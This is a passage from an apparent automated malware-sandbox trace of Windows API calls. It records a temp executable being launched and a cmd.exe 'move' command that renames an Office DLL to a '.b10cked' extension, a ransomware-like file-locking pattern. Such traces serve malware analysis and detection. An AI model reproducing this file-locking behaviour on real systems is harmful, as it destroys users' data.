_String2="PROCESS", _MaxCount=0x7) returned -13 [0174.225] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0174.226] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0174.226] lstrcmpW (lpString1="\\WsPgAGWN.exe", lpString2="\\XCOPY.EXE") returned -1 [0174.227] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f674*(cb=0x48, lpReserved=0x0, 
lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f6c0 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessInformation=0x18f6c0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xda0, dwThreadId=0x618)) returned 1 [0174.360] CloseHandle (hObject=0x4c) returned 1 [0174.360] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0174.360] GetEnvironmentStringsW () returned 0x332ce0* [0174.360] FreeEnvironmentStringsW (penv=0x332ce0) returned 1 [0174.360] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0175.007] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f5b4 | out: lpExitCode=0x18f5b4*=0x0) returned 1 [0175.007] CloseHandle (hObject=0x50) returned 1 [0175.007] _vsnwprintf (in: _Buffer=0x18f6fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f5c0 | out: _Buffer="00000000") returned 8 [0175.007] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0175.007] GetEnvironmentStringsW () returned 0x3324c0* [0175.008] FreeEnvironmentStringsW (penv=0x3324c0) returned 1 [0175.008] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0175.008] GetEnvironmentStringsW () returned 0x3324c0* [0175.008] FreeEnvironmentStringsW (penv=0x3324c0) returned 1 [0175.008] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f618 | out: lpAttributeList=0x18f618) [0175.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.008] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) 
returned 1 [0175.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.008] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.008] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.008] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.008] SetConsoleInputExeNameW () returned 0x1 [0175.008] GetConsoleOutputCP () returned 0x1b5 [0175.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.009] exit (_Code=0) Process: id = "307" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename 
= "" Region: id = 23725 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23726 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23727 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23728 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23730 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 23731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23951 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23952 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23953 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23954 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 23955 
start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 23956 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23957 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23958 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23959 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23960 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23961 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23962 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23963 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23964 start_va = 0x7f6f0000 
end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23965 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 23966 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23967 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23968 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23969 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23970 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23971 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23972 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 23973 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 23974 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 407 os_tid = 0x994 [0174.253] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fac4 | out: lpSystemTimeAsFileTime=0x26fac4*(dwLowDateTime=0x9dc2e040, dwHighDateTime=0x1d440a9)) [0174.253] 
GetCurrentProcessId () returned 0xa84 [0174.253] GetCurrentThreadId () returned 0x994 [0174.253] GetTickCount () returned 0x32b24 [0174.253] QueryPerformanceCounter (in: lpPerformanceCount=0x26fabc | out: lpPerformanceCount=0x26fabc*=23104202576) returned 1 [0174.253] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0174.253] __set_app_type (_Type=0x1) [0174.253] __p__fmode () returned 0x76b331f4 [0174.253] __p__commode () returned 0x76b331fc [0174.254] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0174.254] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0174.254] GetCurrentThreadId () returned 0x994 [0174.254] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x994) returned 0x38 [0174.254] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.254] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0174.254] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.254] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.254] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa54 | out: phkResult=0x26fa54*=0x0) returned 0x2 [0174.254] VirtualQuery (in: lpAddress=0x26fa8b, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: 
lpAddress=0x171000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0174.254] GetConsoleOutputCP () returned 0x1b5 [0174.254] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.254] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0174.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.255] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0174.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.255] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0174.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.255] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0174.255] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.255] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0174.255] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.255] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0174.255] GetEnvironmentStringsW () returned 0x3d0210* [0174.256] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0174.256] GetEnvironmentStringsW () returned 0x3d0210* [0174.256] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0174.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 
ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9c4 | out: phkResult=0x26e9c4*=0x40) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0xa0, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x0, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegCloseKey (hKey=0x40) returned 0x0 [0174.256] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9c4 | out: 
phkResult=0x26e9c4*=0x40) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x0, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x9, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x9, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x9, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegCloseKey (hKey=0x40) returned 0x0 [0174.256] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638a [0174.256] srand (_Seed=0x5b88638a) [0174.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"" [0174.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"" [0174.257] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.257] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0174.257] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0174.257] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0174.257] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.257] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0174.257] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0174.257] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0174.257] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0174.257] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0174.257] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0174.257] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0174.257] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0174.257] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0174.257] GetEnvironmentStringsW () returned 0x3d2360* 
[0174.258] FreeEnvironmentStringsW (penv=0x3d2360) returned 1 [0174.258] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.258] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.258] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0174.258] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0174.258] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0174.258] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0174.258] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0174.258] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0174.258] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0174.258] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0174.258] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.258] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f790, lpFilePart=0x26f78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f78c*="Desktop") returned 0x18 [0174.258] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.258] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f50c | out: lpFindFileData=0x26f50c) returned 0x3d09f0 [0174.258] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0174.258] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f50c | out: lpFindFileData=0x26f50c) returned 0x3d09f0 [0174.258] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0174.258] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f50c | out: lpFindFileData=0x26f50c) returned 0x3d09f0 [0174.258] 
FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0174.259] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.259] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0174.259] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0174.259] GetEnvironmentStringsW () returned 0x3d0210* [0174.259] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0174.259] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.259] GetConsoleOutputCP () returned 0x1b5 [0174.259] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.259] GetUserDefaultLCID () returned 0x409 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8d0, cchData=128 | out: lpLCData="0") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8d0, cchData=128 | out: lpLCData="0") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8d0, cchData=128 | out: lpLCData="1") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 